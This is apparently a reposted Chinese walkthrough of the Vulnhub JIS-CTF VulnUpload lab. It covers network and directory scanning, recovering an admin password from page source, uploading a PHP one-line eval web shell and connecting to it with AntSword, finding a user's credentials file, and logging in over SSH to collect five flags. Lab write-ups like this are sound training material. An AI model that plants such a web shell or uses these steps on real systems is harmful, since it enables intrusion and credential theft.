【Vulnhub】之JIS-CTF-VulnUpload-CTF01

这篇具有很好参考价值的文章主要介绍了【Vulnhub】之JIS-CTF-VulnUpload-CTF01。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、 部署方法

  1. 在官网上下载靶机ova环境:http://www.mediafire.com/file/t5b4nkynxkm9hj2/CTF01.ova
  2. 使用VMware搭建靶机环境
  3. 攻击机使用VMware上搭建的kali
  4. 靶机和攻击机之间使用NAT模式,保证靶机和攻击机放置于同一网段中。

二、 靶机下载安装

靶机下载与安装参考之前文章:搭建Vulnhub靶机详细步骤

三、渗透测试

根据镜像描述我们预先得知此镜像有5个flag,现在让我们开始吧!

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

第一个flag

arp-scan -l

扫描网段

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

这里发现靶机的IP地址为192.168.15.128,攻击机kali的IP地址为192.168.15.131

使用nmap进行深度的扫描

nmap -A -T4 -p- 192.168.15.128

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

这里发现靶机开放了ssh 22端口,http 80端口。并在robots.txt中,发现疑似flag。

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

我们尝试浏览器输入 http://192.168.15.128/flag 去访问

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试
发现flag1:{8734509128730458630012095}

第二个flag

接下来我们尝试使用dirsearch扫描一下网页目录

dirsearch -u 192.168.15.128

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

http://192.168.15.128/admin_area/

http://192.168.15.128/assets/

http://192.168.15.128/css/

在浏览器中访问http://192.168.15.128/admin_area/,F12发现了admin用户以及其密码:3v1l_H@ck3r。

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试
jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

发现flag2:{7412574125871236547895214}

第三个flag

浏览器访问http://192.168.15.128 ,使用刚才得到的admin用户及密码3v1l_H@ck3r尝试登录。

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

成功进入后发现是可以上传文件的页面,可以尝试是否存在文件上传漏洞

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

写入一句话木马到文件中

<?php eval($_REQUEST[password]); ?>

使用中国蚁剑进行连接

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

连接成功,说明存在文件上传漏洞

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

查看hint.txt文件,发现flag3以及提示查找用户technawi

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

发现flag3:{7645110034526579012345670}

第四个flag

刚才在第三个flag提示我们用technawi去读取flag.txt文件,可以在隐藏文件中找到用户的信息

try to find user technawi password to read the flag.txt file, you can find it in a hidden file

蚁剑打开虚拟终端,查找用户信息,2>/dev/null是过滤掉类似没有权限的信息

find / -user 'technawi' 2>/dev/null

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

此时我们看到了一个特殊的文件/etc/mysql/conf.d/credentials.txt ,我们尝试去读一下里面的信息,得到flag4以及username和password

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

发现flag4: {7845658974123568974185412}

第五个flag

根据flag3的提示,我们登录technawi用户直接查看/var/www/html/flag.txt

ssh technawi@192.168.15.128
cat /var/www/html/flag.txt

jis-ctf-vulnupload-ctf01,vulnhub,靶机,网络安全,网络安全,安全,安全性测试

发现flag5:{5473215946785213456975249}

四、总结

此靶机一共找到了5个flag,分别通过端口扫描、网站目录扫描得到账密成功登录网站,并通过发现文件上传漏洞,利用一句话木马传到靶机,再通过蚁剑进行连接,最后查找并登录technawi用户查看隐藏文件flag.txt得到全部flag。文章来源地址https://www.toymoban.com/news/detail-811076.html

到了这里,关于【Vulnhub】之JIS-CTF-VulnUpload-CTF01的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • vulnhub靶场实战系列(一)之vulnhub靶场介绍

    Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。 我们在学

    2024年02月10日
    浏览(41)
  • vulnhub DC-5靶场

    目录 1.信息收集 2.网站分析 3.漏洞利用 4.提升权限 扫描主机 sudo arp-scan -l 扫描端口 nmap -p- 192.168.42.149 扫描指纹 whatweb 192.168.42.149 查看端口详细服务 nmap -A -p- -v 192.168.42.149 扫描目录 dirbuster 浏览网站,发现都是静态页面 只有contact.php有上传窗口 尝试上传,发现问题copyright旁的

    2024年02月05日
    浏览(39)
  • vulnhub——Earth靶机

    netdiscover 直接用netdiscover模糊搜索一下主机 可以发现靶机地址为192.168.60.174  80端口返回HTTP400,向下看发现有DNS解析  修改一下hosts文件  再次nmap进行扫描,之前返回HTTP400的页面就没问题了 下面有三行数值  https://terratest.earth.local的页面内容不一样 dirb扫描 http://earth.local、

    2024年02月02日
    浏览(47)
  • Vulnhub靶机:driftingblues 4

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues4(10.0.2.20) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-4,661/ 使用nmap主机发现靶机ip: 10.0.2.20 使用nmap端口扫描发现靶机开放端口: 21、22、80 打开网站没有可利用的功能点,并且

    2024年02月01日
    浏览(47)
  • Vulnhub-Lampiao

    nmap扫描 1. hydra爆破密码 在主页点击read me跳转页面 把url地址后面的1更改为2 发现一个音频文件和一个二维码图片 通过音频文件得到账号为tiago,扫描二维码图片提示爆破。利用cewl工具爬取生成一个字典进行爆破 2. Drupal漏洞利用 通过drub爆破得到robots.txt文件 在robots文件中发现

    2024年01月21日
    浏览(43)
  • vulnhub_Earth

    靶机地址-vulnhub_Earth 攻击机ip:192.168.20.121 靶机ip:192.168.20.122 参考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnblogs.com/wthuskyblog/p/16032277.html https://www.cnblogs.com/CHOSEN1-Z13/p/15915195.html 使用nmap扫描c段 nmap 192.168.20.0/24 点击查看扫描结果 这里可以发现192.168.20.1

    2023年04月19日
    浏览(26)
  • 【VulnHub靶场】——CHRONOS: 1

    作者名:Demo不是emo  主页面链接 : 主页传送门 创作初心: 一切为了她 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: 网络安全,数据结构 每日emo: 要做个明亮的人,要有个珍藏的故事,要看遍山河日落,要不虚此行。  从10月中旬开始制定了 为期24周的打靶训练

    2024年02月09日
    浏览(35)
  • [Vulnhub靶机] DC-1

    [Vulnhub靶机] DC-1靶机渗透思路及方法(个人分享) 靶机下载地址: https://download.vulnhub.com/dc/DC-1.zip 靶机地址:192.168.67.28 攻击机地址:192.168.67.3 1.使用 arp-scan 命令扫描网段内存活的主机,以获取靶机ip地址 arp-scan -I 指定网卡 -l 2.使用  nmap  工具扫描靶机开放端口、服务版本

    2024年01月20日
    浏览(120)
  • Vulnhub_CengBox

    目录 一 环境异常处理 (一)nat设置无法正常获取地址 1 单用户模式进入命令行 2 passwd更改 3 修改网络配置文件 二 环境测试 (一)信息收集 1 端口服务 2 目录扫描 (二)漏洞测试 1 SQL注入万能密码绕过 2 文件上传getshell (三)提权 1 python脚本提权 三 环境知识点 (一)二级

    2024年02月03日
    浏览(20)
  • vulnhub靶机Brainpan

    主机发现 arp-scan -l 端口扫描 nmap --min-rate 10000 -p- 192.168.21.156 服务扫描 nmap -sV -sT -O -p9999,10000 192.168.21.156 这个地方感到了有点不对劲,python起来的一个web端口 漏洞扫描 nmap --script=vuln -p9999,10000 192.168.21.156 意料之中,先去看一下web的内容 这个就是一张图片,但是还是扫个目录看

    2024年02月09日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包